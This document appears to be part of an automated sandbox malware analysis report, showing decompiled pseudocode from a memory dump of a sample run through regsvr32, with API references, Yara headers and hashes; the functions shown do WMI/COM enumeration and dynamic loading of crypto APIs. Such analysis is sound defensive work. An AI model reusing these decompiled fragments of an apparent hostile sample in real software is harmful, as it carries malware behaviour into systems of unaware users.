                                                                                                                                                                                              			E042ADA6D(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E042AA0A3(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}









                                                                                                                                                                                              0x042ada70
                                                                                                                                                                                              0x042ada71
                                                                                                                                                                                              0x042ada74
                                                                                                                                                                                              0x042ada77
                                                                                                                                                                                              0x042ada7c
                                                                                                                                                                                              0x042ada7f
                                                                                                                                                                                              0x042ada82
                                                                                                                                                                                              0x042ada82
                                                                                                                                                                                              0x042ada8a
                                                                                                                                                                                              0x042ada8f
                                                                                                                                                                                              0x042ada92
                                                                                                                                                                                              0x042ada95
                                                                                                                                                                                              0x042ada98
                                                                                                                                                                                              0x042ada9b
                                                                                                                                                                                              0x042adaae
                                                                                                                                                                                              0x042adaaf
                                                                                                                                                                                              0x042adab2
                                                                                                                                                                                              0x042adab8
                                                                                                                                                                                              0x042adabb
                                                                                                                                                                                              0x042adabe
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042adac0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042adabe
                                                                                                                                                                                              0x042adac4
                                                                                                                                                                                              0x042adac4
                                                                                                                                                                                              0x042adac6
                                                                                                                                                                                              0x042adac6
                                                                                                                                                                                              0x042adac9
                                                                                                                                                                                              0x042adac9
                                                                                                                                                                                              0x042adace
                                                                                                                                                                                              0x042adad6
                                                                                                                                                                                              0x042adae2

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNELBASE(0000000A), ref: 042ADAD6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                              • Opcode ID: a42db222107af0d1f7303c4df309c30879ef34fa976a089811e64c1e91cb69c3
                                                                                                                                                                                              • Instruction ID: b4789fa434229c6c78302a1451d78a239c4d07b5ae31c07d7e4d5aa924f59694
                                                                                                                                                                                              • Opcode Fuzzy Hash: a42db222107af0d1f7303c4df309c30879ef34fa976a089811e64c1e91cb69c3
                                                                                                                                                                                              • Instruction Fuzzy Hash: A5115B31B24206AFEB10CF99D584A99B7E9FF88324F148869EC5ADB701D370FA50CB40
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                              Function 042AEA4A Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E042AEA4A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E042AE400(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E042A8BDE(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E042A8BF4( &_v60, 0xfffffffe);
					E042AE4B4( &_v104);
					return _t320;
				}
				_t165 = E042A9DF2(_t255, 0x3a7);
				 *_t328 = 0xae7;
				_v52 = _t165;
				_t166 = E042A9DF2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E042A9A5A(_t165);
				_v60 = _t322;
				E042A8BAF( &_v52);
				E042A8BAF( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E042A9DF2(_t255, 0x886);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E042A8BAF( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E042A8BF4( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E042A98BD(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E042A98BD(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E042A8C72(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E042A8BDE( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E042A8BF4(_t136, 0);
								E042A8BF4( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E042A98BD(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E042A9DF2(_t281, 0xb28);
								 *_t329 = 0x83f;
								_t217 = E042A9DF2(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E042A8BDE(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E042A8BAF( &_v92);
											E042A8BAF( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E042A9E51();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E042A8BDE(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E042A9DF2(_t283, 0xe0a);
										E042A9E51( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E042A8BAF( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E042A98BD(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E042AE92E( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E042A8BF4( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                                                                                                                                                                                              0x042aea53
                                                                                                                                                                                              0x042aea59
                                                                                                                                                                                              0x042aea60
                                                                                                                                                                                              0x042aea63
                                                                                                                                                                                              0x042aea66
                                                                                                                                                                                              0x042aea6b
                                                                                                                                                                                              0x042aea6d
                                                                                                                                                                                              0x042aea72
                                                                                                                                                                                              0x042aeeba
                                                                                                                                                                                              0x042aeeba
                                                                                                                                                                                              0x042aea7f
                                                                                                                                                                                              0x042aea81
                                                                                                                                                                                              0x042aea84
                                                                                                                                                                                              0x042aea87
                                                                                                                                                                                              0x042aee9f
                                                                                                                                                                                              0x042aeea5
                                                                                                                                                                                              0x042aeeaf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aeeb4
                                                                                                                                                                                              0x042aea92
                                                                                                                                                                                              0x042aea99
                                                                                                                                                                                              0x042aeaa0
                                                                                                                                                                                              0x042aeaa3
                                                                                                                                                                                              0x042aeaa8
                                                                                                                                                                                              0x042aeaaa
                                                                                                                                                                                              0x042aeaad
                                                                                                                                                                                              0x042aeab0
                                                                                                                                                                                              0x042aeab1
                                                                                                                                                                                              0x042aeaba
                                                                                                                                                                                              0x042aeac0
                                                                                                                                                                                              0x042aeac3
                                                                                                                                                                                              0x042aeacc
                                                                                                                                                                                              0x042aead1
                                                                                                                                                                                              0x042aead6
                                                                                                                                                                                              0x042aeaed
                                                                                                                                                                                              0x042aeafa
                                                                                                                                                                                              0x042aeafd
                                                                                                                                                                                              0x042aeb04
                                                                                                                                                                                              0x042aeb09
                                                                                                                                                                                              0x042aeb10
                                                                                                                                                                                              0x042aeb15
                                                                                                                                                                                              0x042aeb1c
                                                                                                                                                                                              0x042aeb1e
                                                                                                                                                                                              0x042aeb2a
                                                                                                                                                                                              0x042aeb2d
                                                                                                                                                                                              0x042aeb2f
                                                                                                                                                                                              0x042aee8f
                                                                                                                                                                                              0x042aee90
                                                                                                                                                                                              0x042aee99
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aee99
                                                                                                                                                                                              0x042aeb35
                                                                                                                                                                                              0x042aeb38
                                                                                                                                                                                              0x042aeb3b
                                                                                                                                                                                              0x042aeb3e
                                                                                                                                                                                              0x042aeb40
                                                                                                                                                                                              0x042aee5b
                                                                                                                                                                                              0x042aee5e
                                                                                                                                                                                              0x042aee61
                                                                                                                                                                                              0x042aee63
                                                                                                                                                                                              0x042aee85
                                                                                                                                                                                              0x042aee8a
                                                                                                                                                                                              0x042aee65
                                                                                                                                                                                              0x042aee68
                                                                                                                                                                                              0x042aee73
                                                                                                                                                                                              0x042aee7a
                                                                                                                                                                                              0x042aee7a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aeb46
                                                                                                                                                                                              0x042aeb46
                                                                                                                                                                                              0x042aeb58
                                                                                                                                                                                              0x042aeb5b
                                                                                                                                                                                              0x042aeb5d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aeb65
                                                                                                                                                                                              0x042aeb68
                                                                                                                                                                                              0x042aeb6b
                                                                                                                                                                                              0x042aeb6e
                                                                                                                                                                                              0x042aeb71
                                                                                                                                                                                              0x042aeb74
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aeb7a
                                                                                                                                                                                              0x042aeb88
                                                                                                                                                                                              0x042aeb8b
                                                                                                                                                                                              0x042aeb8d
                                                                                                                                                                                              0x042aeba6
                                                                                                                                                                                              0x042aebb5
                                                                                                                                                                                              0x042aebbd
                                                                                                                                                                                              0x042aebbd
                                                                                                                                                                                              0x042aebc0
                                                                                                                                                                                              0x042aebc7
                                                                                                                                                                                              0x042aebcb
                                                                                                                                                                                              0x042aebd1
                                                                                                                                                                                              0x042aebd3
                                                                                                                                                                                              0x042aee43
                                                                                                                                                                                              0x042aee49
                                                                                                                                                                                              0x042aee4f
                                                                                                                                                                                              0x042aee52
                                                                                                                                                                                              0x042aee52
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aee52
                                                                                                                                                                                              0x042aebe2
                                                                                                                                                                                              0x042aebf6
                                                                                                                                                                                              0x042aebfa
                                                                                                                                                                                              0x042aebfc
                                                                                                                                                                                              0x042aec01
                                                                                                                                                                                              0x042aee10
                                                                                                                                                                                              0x042aee16
                                                                                                                                                                                              0x042aee21
                                                                                                                                                                                              0x042aee2c
                                                                                                                                                                                              0x042aee32
                                                                                                                                                                                              0x042aee38
                                                                                                                                                                                              0x042aee3b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aee3b
                                                                                                                                                                                              0x042aec07
                                                                                                                                                                                              0x042aedde
                                                                                                                                                                                              0x042aedde
                                                                                                                                                                                              0x042aede1
                                                                                                                                                                                              0x042aede4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aec0f
                                                                                                                                                                                              0x042aec17
                                                                                                                                                                                              0x042aec1e
                                                                                                                                                                                              0x042aec24
                                                                                                                                                                                              0x042aec26
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aec2f
                                                                                                                                                                                              0x042aec44
                                                                                                                                                                                              0x042aec4a
                                                                                                                                                                                              0x042aec53
                                                                                                                                                                                              0x042aec56
                                                                                                                                                                                              0x042aec59
                                                                                                                                                                                              0x042aec5b
                                                                                                                                                                                              0x042aedd1
                                                                                                                                                                                              0x042aedd4
                                                                                                                                                                                              0x042aeddd
                                                                                                                                                                                              0x042aeddd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aeddd
                                                                                                                                                                                              0x042aec6b
                                                                                                                                                                                              0x042aec6e
                                                                                                                                                                                              0x042aec75
                                                                                                                                                                                              0x042aec7b
                                                                                                                                                                                              0x042aec7e
                                                                                                                                                                                              0x042aec81
                                                                                                                                                                                              0x042aec84
                                                                                                                                                                                              0x042aec87
                                                                                                                                                                                              0x042aecc3
                                                                                                                                                                                              0x042aecc3
                                                                                                                                                                                              0x042aecc6
                                                                                                                                                                                              0x042aed72
                                                                                                                                                                                              0x042aed86
                                                                                                                                                                                              0x042aed96
                                                                                                                                                                                              0x042aed9a
                                                                                                                                                                                              0x042aed9c
                                                                                                                                                                                              0x042aedb3
                                                                                                                                                                                              0x042aedb7
                                                                                                                                                                                              0x042aedc0
                                                                                                                                                                                              0x042aedcb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aedcb
                                                                                                                                                                                              0x042aeda2
                                                                                                                                                                                              0x042aeda3
                                                                                                                                                                                              0x042aeda8
                                                                                                                                                                                              0x042aeda8
                                                                                                                                                                                              0x042aedaa
                                                                                                                                                                                              0x042aedab
                                                                                                                                                                                              0x042aedb0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aedb0
                                                                                                                                                                                              0x042aeccc
                                                                                                                                                                                              0x042aeccc
                                                                                                                                                                                              0x042aeccf
                                                                                                                                                                                              0x042aed3a
                                                                                                                                                                                              0x042aed4e
                                                                                                                                                                                              0x042aed5e
                                                                                                                                                                                              0x042aed62
                                                                                                                                                                                              0x042aed64
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aed6a
                                                                                                                                                                                              0x042aed6b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aed6b
                                                                                                                                                                                              0x042aecd1
                                                                                                                                                                                              0x042aecd1
                                                                                                                                                                                              0x042aecd4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aecd6
                                                                                                                                                                                              0x042aecd9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aecdb
                                                                                                                                                                                              0x042aecdb
                                                                                                                                                                                              0x042aece1
                                                                                                                                                                                              0x042aecfd
                                                                                                                                                                                              0x042aed0c
                                                                                                                                                                                              0x042aed15
                                                                                                                                                                                              0x042aed1a
                                                                                                                                                                                              0x042aed1d
                                                                                                                                                                                              0x042aed23
                                                                                                                                                                                              0x042aed23
                                                                                                                                                                                              0x042aed28
                                                                                                                                                                                              0x042aed34
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aed34
                                                                                                                                                                                              0x042aece6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aece6
                                                                                                                                                                                              0x042aec89
                                                                                                                                                                                              0x042aecb0
                                                                                                                                                                                              0x042aecb5
                                                                                                                                                                                              0x042aecba
                                                                                                                                                                                              0x042aecbc
                                                                                                                                                                                              0x042aecbc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aecba
                                                                                                                                                                                              0x042aec8b
                                                                                                                                                                                              0x042aec8b
                                                                                                                                                                                              0x042aec8e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aec94
                                                                                                                                                                                              0x042aec94
                                                                                                                                                                                              0x042aec97
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aec9d
                                                                                                                                                                                              0x042aec9d
                                                                                                                                                                                              0x042aeca0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aeca6
                                                                                                                                                                                              0x042aeca9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aecab
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aecab
                                                                                                                                                                                              0x042aeded
                                                                                                                                                                                              0x042aedf3
                                                                                                                                                                                              0x042aedf9
                                                                                                                                                                                              0x042aedfc
                                                                                                                                                                                              0x042aedff
                                                                                                                                                                                              0x042aedff
                                                                                                                                                                                              0x042aee02
                                                                                                                                                                                              0x042aee03
                                                                                                                                                                                              0x042aee06
                                                                                                                                                                                              0x042aee08
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aee58
                                                                                                                                                                                              0x042aee58
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aee58
                                                                                                                                                                                              0x042aeb8f
                                                                                                                                                                                              0x042aeb95
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aeb95
                                                                                                                                                                                              0x042aee55
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aead8
                                                                                                                                                                                              0x042aeadd
                                                                                                                                                                                              0x042aeae2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042aeae6

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 042AE400: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,042AE731,000009DA,00000000,?,00000000), ref: 042AE413
                                                                                                                                                                                                • Part of subcall function 042AE400: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,042AE731,000009DA,00000000,?,00000000), ref: 042AE424
                                                                                                                                                                                                • Part of subcall function 042AE400: CoCreateInstance.OLE32(042BC868,00000000,00000001,042BC878,?,?,042AE731,000009DA,00000000,?,00000000), ref: 042AE43B
                                                                                                                                                                                                • Part of subcall function 042AE400: SysAllocString.OLEAUT32(00000000), ref: 042AE446
                                                                                                                                                                                                • Part of subcall function 042AE400: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,042AE731,000009DA,00000000,?,00000000), ref: 042AE471
                                                                                                                                                                                                • Part of subcall function 042A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,042A959D,00000100,?,042A6507), ref: 042A8BEC
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 042AEAF3
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 042AEB07
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 042AEE90
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 042AEE99
                                                                                                                                                                                                • Part of subcall function 042A8BF4: HeapFree.KERNEL32(00000000,00000000), ref: 042A8C3A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                                              • String ID: FALSE$TRUE
                                                                                                                                                                                              • API String ID: 1290676130-1412513891
                                                                                                                                                                                              • Opcode ID: a82828c462a1328f9f3bbfa3fc1e54fcfcca1cba6eaa0fb661c127a9384bf3c3
                                                                                                                                                                                              • Instruction ID: c79a52c0bc1da5286b6a38cfbf081f9e817da03b835d83188ff1fd251d1c574b
                                                                                                                                                                                              • Opcode Fuzzy Hash: a82828c462a1328f9f3bbfa3fc1e54fcfcca1cba6eaa0fb661c127a9384bf3c3
                                                                                                                                                                                              • Instruction Fuzzy Hash: E9E17DB1F10219AFDB14EFA8C984AEEBBB9FF08304F104459E905E7240DB71B956CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042B28F0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E042B28F0(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E042B284B( &_v16);
				return 0;
			}











                                                                                                                                                                                              0x042b28f6
                                                                                                                                                                                              0x042b2908
                                                                                                                                                                                              0x042b290c
                                                                                                                                                                                              0x042b2980
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b2982
                                                                                                                                                                                              0x042b291c
                                                                                                                                                                                              0x042b2920
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b2928
                                                                                                                                                                                              0x042b292a
                                                                                                                                                                                              0x042b292f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b2939
                                                                                                                                                                                              0x042b293d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b293f
                                                                                                                                                                                              0x042b2944
                                                                                                                                                                                              0x042b2946
                                                                                                                                                                                              0x042b2948
                                                                                                                                                                                              0x042b294d
                                                                                                                                                                                              0x042b2952
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b295d
                                                                                                                                                                                              0x042b2967
                                                                                                                                                                                              0x042b296b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b297a
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,042A7B6A), ref: 042B2902
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 042B291A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 042B2928
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 042B2937
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                              • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
